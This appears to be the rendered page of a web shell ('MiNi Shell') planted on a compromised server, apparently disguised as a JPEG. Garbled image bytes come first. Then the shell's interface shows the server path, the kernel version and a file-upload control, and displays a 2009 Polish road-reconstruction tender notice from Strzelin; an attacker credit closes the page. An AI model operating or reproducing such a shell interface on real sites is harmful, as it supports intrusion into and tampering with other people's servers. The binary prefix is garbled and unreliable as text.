JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090903/304818-N-2009.html

<p class="kh_header"><b>Strzelin: Przebudowa drogi wojewódzkiej nr 395 w Strzelinie ul.Ząbkowicka</b><br>
<b>Numer ogłoszenia: 304818 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Strzelinie , ul. Kamienna 3, 57-100 Strzelin, woj. dolnośląskie, tel. 071 3923016 wew. 61, 63, faks 071 3923015.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi wojewódzkiej nr 395 w Strzelinie ul.Ząbkowicka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa drogi wojewódzkiej nr 395 w Strzelinie ul. Ząbkowicka
Zakres robót obejmuje:
Branża Drogowa 
1.Zabezpieczenie drzew
2.Roboty rozbiórkowe 
3.Ręczne ścinanie i karczowanie drzew i krzewów z wywozem 
4.Rozebranie nawierzchni jezdni z kostki kamiennej o wys. 15-20 cm 
- Ręczne rozebranie nawierzchni chodników i wjazdów 
- kostka betonowa, kamienna, płyty chodnikowe 
- Rozebranie krawężników kamiennych 20x35 cm na podsypce piaskowej 
- Rozebranie obrzeży 8x30 cm na podsypce piaskowej 
5.Roboty ziemne 
- Mechaniczne wykonanie koryta z profilowaniem w gruncie kat. I-IV 
6.Nawierzchnie z mieszanek mineralno-bitumicznych SMA 0/12,8 warstwa ścieralna gr. 5 cm 
7.Nawierzchnie z mieszanek mineralno-bitumicznych 0/20 warstwa wiążąca gr.8cm 
8.Podbudowa z mieszanek mineralno-bitumicznych 0/25 o gr. 10 cm 
9.Podbudowa z kruszywa łamanego - warstwa dolna o grubości po zagęszczeniu 20cm
10.Warstwa piasku stabilizowanego cementem o Rm=2,5 Mpa gr. 25cm 
11.Nawierzchnia z kostki kamiennej (z odzysku) granitowej 18 cm na podsypce cementowo-piaskowej - zatoka autobusowa 
12.Nawierzchnia chodnika z kostki brukowej betonowej gr. 8cm na podsypce cementowo-piaskowej
13.Nawierzchnia zjazdów z kostki kamiennej (z odzysku) granitowej 16 cm na podsypce cementowo-piaskowej 
14.Ustawienie krawężników betonowych o wymiarach 20x30 cm i 15x30 cm na podsypce cementowo-piaskowej na ławie betonowej z oporem  
15.Ustawienie obrzeży betonowych 30x8 cm na podsypce piaskowej na ławie betonowej z oporem 
16. Ściek z kostki kamiennej (z odzysku) o wys. 18 cm na podsypce cementowo-piaskowej na ławie betonowej - 2 rzędy 
17.Sadzenie krzewów liściastych i iglastych 16 Ściółka z kory gr. 5 cm 
18.Docelowa organizacja ruchu: oznakowanie poziome i pionowe 
19.Oznakowanie tymczasowe - ryczałt 
Branża sanitarna: 
Kanalizacja deszczowa 
1. Wykopy z zasypaniem, wykonywane w gruncie kat. III, o ścianach zabezpieczonych obudową(szalunek szczelny) 
2. Kanały z rur PP SN8 150 np. typu Wavin X-Stream 
3. Kanały z rur PP SN8 200 np. typu Wavin X-Stream 
4. Kanały z rur PP SN8 300 np. typu Wavin X-Stream 
5. Kanały z rur PP SN8 400 np. typu Wavin X-Stream 
6. Kanały z rur PP SN8 450 np. typu Wavin X-Stream 
7. Kanały z rur żelbetowych bezciśnieniowych o śr. 300 mm 
8. Kanały z rur żelbetowych bezciśnieniowych o śr. 600 mm 
9. Kanały z rur żelbetowych bezciśnieniowych o śr. 800 mm 
10. Studnie rewizyjne z kręgów betonowych o śr 1200 mm 
11. Studnie rewizyjne z kręgów betonowych o śr. 1500 mm 
12. Studzienki ściekowe uliczne betonowe o śr. 500 mm z osadnikiem i syfonem 
Kanalizacja sanitarna 
1 Kanały z rur PP SN8 300 np. typu Wavin X-Stream 
2 Studnie rewizyjne z kręgów betonowych o śr. 1000 mm 
Przebudowa gazociągu 
1. Regulacja pionowa skrzynek gazowych 
2. Montaż rurociągów z rur polietylenowych PEHD SDR 17,6 o śr. zew. 160 mm 
3. Demontaż kolidującego gazociągu z wywozem i utylizacją 
Wodociąg 
1. Regulacja pionowa skrzynek wodociągowych 
2. Montaż rurociągów z rur polietylenowych PEHD SDR17 PE100 o śr. zew. 160mm 
3. Demontaż odcinka istniejącego wodociągu z wywozem i utylizacją 
Branża elektryczna 
1. Demontaż słupów oświetleniowych 
2. Stawianie aluminiowych słupów oświetleniowych h=8m 
3. Montaż opraw świetlówkowych 
Branża telekomunikacyjna 
1. Budowa obiektów podziemnych z rur AROT 110, 160 
2. Budowa studni kablowych rozdzielczych 
3. Budowa kanalizacji kablowej pierwotnej 
4. Układanie kabla wypełnionego w rowie kablowym, kabel o śr.30-50 mm. 

Szczegółowy opis przedmiotu zamówienia zawiera:
a)dokumentacja projektowa,
b)przedmiary robót,
c)specyfikacja techniczna wykonania i odbioru robót budowlanych.
Okres gwarancyjny na roboty obejmujące przedmiot zamówienia wynosi: min. 36 miesięcy od daty bezusterkowego odbioru końcowego. 
Roboty budowlane należy wykonać zgodnie z projektem opracowanym przez Przedsiębiorstwo Projektowo - Usługowe Linia s.c. ul. Bystrzycka 89, 54-215 Wrocław, zgodnie z pozwoleniem na budowę nr 257/2009 z dnia 22 lipca 2009r. Starosty Strzelińskiego i decyzją Wojewody Dolnośląskiego nr 13/09 o zezwoleniu na realizację inwestycji drogowej z dnia 28 lipca 2009r.

UWAGA: Wykonawca umożliwi wejście na teren budowy drugiemu wykonawcy w celu  wykonania niezbędnych robót instalacyjnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 65.000,00 złotych (słownie: sześćdziesiąt pięć tysięcy złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W przetargu mogą wziąć udział Wykonawcy, którzy złożą ważną i odpowiednią ofertę oraz:
a)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP,

a ponadto:

e) wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: min 2 (dwa) zadania w zakresie budowy i/lub przebudowy dróg, o wartości min 5.000.000,00 złotych brutto każde zadanie z podaniem ich wartości oraz daty i miejsca wykonania. 
f) wykonali w/w roboty z należytą starannością, 
g) dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia oraz posiadającymi kwalifikacje niezbędne do wykonania zamówienia, tj.: 
1.min. jedną osobą na stanowisku Kierownika Robót Drogowych. Osoba na tym stanowisku 	winna posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności 	drogowej, a także być członkiem Polskiej Izby Inżynierów Budownictwa.
2.min jedną osobą lub osobami posiadającą lub posiadającymi uprawnienia w zakresie sieci gazowych, wodociągowych, kanalizacyjnych, energetycznych i teletechnicznych. Osoba lub osoby na tym 	stanowisku powinny posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności sieci gazowej, wodociągowej i kanalizacyjnej, łącznie lub osobno dla każdej z tych specjalności, a także być członkiem Polskiej Izby Inżynierów Budownictwa.
h) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 5.000.000,00 PLN, 
i) oświadczą, że spełniają warunki określone w art. 22 PZP ust. 1 oraz że nie podlegają wykluczeniu z postępowania na podstawie art. 24 PZP, 
j) zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust. 1 pkt 2, 3, 4, 5, ust. 2 pkt 1, 5 i/lub 5a, 6 oraz ust. 3 pkt 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane. (Dz.U. Nr 87 z dnia 24 maja 2006 r. poz. 605 z późn. zmianami). 

2. Sprawdzenie w/w warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY  W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ POZOSTAŁYCH WYMAGANYCH DOKUMENTÓW 

1. Wypełniony i podpisany formularz oferty wg załącznika nr 1 do SIWZ.
2. Wypełniony i podpisany formularz kosztorysu ofertowego  wg załącznika nr 2 do SIWZ.
3. Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy 
 wg załącznika nr 3 do SIWZ.
4. Dowód wpłaty wadium (w przypadku formy pieniężnej - potwierdzenie przelewu środków finansowych na konto Zamawiającego, w przypadku pozostałych form wniesienia - wadium oryginał dokumentu należy dołączyć do oferty). Oryginał dowodu wniesienia wadium należy umieścić w oznaczonej kopercie oryginał dowodu wniesienia wadium i załączyć do oferty. 
5. Zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust. 1 pkt 2, 3,  ust. 2 pkt 1, 5, 5*(jeżeli dotyczy), 6 oraz ust. 3 pkt 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87 z dnia 24 maja 2006 r. poz. 605 z późn. zmianami):
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia 
do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
 b) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
c) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
d) wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wg załącznika nr 4 do SIWZ;

e) dokumenty (referencje lub inny dokument) od poprzednich Zamawiających potwierdzające, że roboty wymienione w załączniku Nr 4 zostały wykonane należycie; 

f) wykaz osób, które będą uczestniczyć w wykonaniu zamówienia z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia wraz z dokumentami stwierdzającymi posiadane uprawnienia, a w przypadku osób posiadających uprawnienia budowlane także z dokumentami potwierdzającymi przynależność do właściwej Izby Samorządu Zawodowego. Do wykazu należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia - wg załącznika nr 5 do SIWZ;
g) polisa lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
6. Zgodnie z § 4 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87 z dnia 24 maja 2006 r. poz. 605 z późn. zmianami) w/w dokumenty Wykonawca może złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub pełnomocnego przedstawiciela Wykonawcy.
7. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 5 litera a-c składa odpowiednio dokumenty wymienione w § 2 ust. 1-3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane. 
7.1. Dokumenty, o których mowa w pkt 7 są składane w formie oryginału, odpisu, wypisu, wyciągu lub kopii wraz tłumaczeniem na język polski, poświadczonym przez Wykonawcę. 
7.2. Dokumenty sporządzone w języku obcym, inne niż określone w pkt 7, są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę.
8.  Zaakceptowany wzór umowy załącznik nr 6 do SIWZ.
9.Harmonogram rzeczowo - terminowo -finansowy uwzględniający wykonanie całego przedmiotu umowy od daty podpisania umowy do 30 września 2010r., z tym że wartość robót wykonanych w 2009r. nie może przekraczać 60% ceny ofertowej brutto. Harmonogram musi zawierać:
a) podział przedmiotu zamówienia na poszczególne części (elementy), które mogą stanowić osobny element odbioru częściowego,
b) terminy wykonania wyszczególnionych części oraz ich ceny; ceny te muszą wynikać z załączonego do oferty kosztorysu ofertowego wykonanego zgodnie z zapisami zamieszczonymi w punkcie XII SIWZ. 
10. Zgodnie z art. 23 ust.1 PZP Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia. 
10.1. W w/w przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być dołączone do oferty. Zamawiający dopuszcza złożenie przedmiotowego dokumentu w formie oryginału lub kserokopii poświadczonej  za zgodność z oryginałem przez notariusza lub mocodawcę.
10.2. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, dokumenty wymienione punkcie 5 litera a-c i w punkcie 3 winien dołączyć każdy podmiot występujący wspólnie. Oświadczenie wymienione w punkcie 3 Wykonawcy mogą złożyć wspólnie na jednym dokumencie lub każdy z nich na odrębnym dokumencie w zakresie spełnianych przez nich warunków określonych w art. 22 ust. 1 ustawy PZP. 
11. Jeżeli Wykonawca nie złoży wymaganych dokumentów, oświadczeń czy pełnomocnictw lub nie spełni jednego bądź więcej warunków, jego oferta zostanie odrzucona lub Wykonawca zostanie wykluczony z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy PZP.
Zgodnie z art. 24 ust. 4 ustawy ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiatstrzelinski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg ul. Kamienna 3 57-100 Strzelin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2009 godzina 10:00, miejsce: Powiatowy Zarząd Dróg, ul. Kamienna 3, 57-100 Strzelin w sekretariacie.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com